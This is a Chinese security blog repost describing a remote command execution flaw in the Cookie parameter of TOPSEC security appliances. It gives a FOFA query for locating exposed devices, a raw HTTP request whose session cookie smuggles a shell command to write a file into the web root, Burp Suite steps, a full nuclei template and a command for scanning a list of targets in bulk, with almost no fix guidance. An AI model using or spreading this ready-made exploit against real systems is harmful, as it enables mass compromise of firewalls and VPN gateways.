天X信TOPSEC Cookie 远程命令执行漏洞

admin

104367
文章

87
评论

2024年1月9日12:25:16评论31 views字数 2295阅读7分39秒阅读模式

天X信TOPSEC Cookie 远程命令执行漏洞

前言：本文中涉及到的相关技术或工具仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担，如有侵权请联系。

由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

漏洞详情：

天融信TOPSEC解决方案包括综合管理系统，各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞，会导致服务器失陷。

影响范围

天融信TOPSEC

资产测绘

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

漏洞利用

payload：
GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: XSec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Cookie: session_id_443=1|echo 'nvgjngfszfzah1' > /www/htdocs/site/image/ecisas.txt;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

使用方法：

1、使用浏览器访问目标系统，并使用BurpSuite进行拦截抓包；

2、将BurpSuite拦截的GET请求包添加所需payload中cookie，并放包

3、请求结果状态码返回为200访问设置的回显地址

http://0.0.0.0/site/image/123123.txt

漏洞修复建议

查看官网厂商信息

nuclei poc

info:  name: 天融信TOPSEC Cookie 远程命令执行漏洞  author: fgz  severity: critical  description: 天融信TOPSEC解决方案包括综合管理系统，各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞，会导致服务器失陷。  metadata:    max-request: 1    fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"    verified: truevariables:  file_name: "{{to_lower(rand_text_alpha(6))}}"  file_content: "{{to_lower(rand_text_alpha(15))}}"requests:  - raw:      - |+        GET /cgi/maincgi.cgi?Url=aa HTTP/1.1        Host: {{Hostname}}        Cookie: session_id_443=1|echo '{{file_content}}' > /www/htdocs/site/image/{{file_name}}.txt;        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
      - |        GET /site/image/{{file_name}}.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
    matchers:      - type: dsl        dsl:          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

批量使用方法

nuclei -t topsec-maincgi-cookie-rce.yaml -l url.txt

感谢各位大佬们关注-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持。

原文始发于微信公众号（不秃头的安全）：天X信TOPSEC Cookie 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

天X信TOPSEC Cookie 远程命令执行漏洞

漏洞预警 | 金和OA C6 任意文件读取漏洞

漏洞预警 | 用友U8Cloud XXE漏洞

漏洞预警 | 福建科立讯通信指挥调度管理平台SQL注入漏洞

漏洞复现 | 大华ICC智能物联综合管理平台fastjson漏洞【附poc】

【0day】全智能停车视频收费系统WebServiceToAndroid存在任意文件上传漏洞

飞鱼星企业级智能上网行为管理系统 send_order.cgi 任意命令执行

亿赛通电子文档安全管理系统-File Read

(0day)WVP-GB28181摄像头管理平台存在敏感信息泄露

D-Link 路由器正遭受0day攻击，可被远程接管【附PoC】

CVE-2023-42442｜JumpServer未授权访问漏洞

发表评论

在线咨询

微信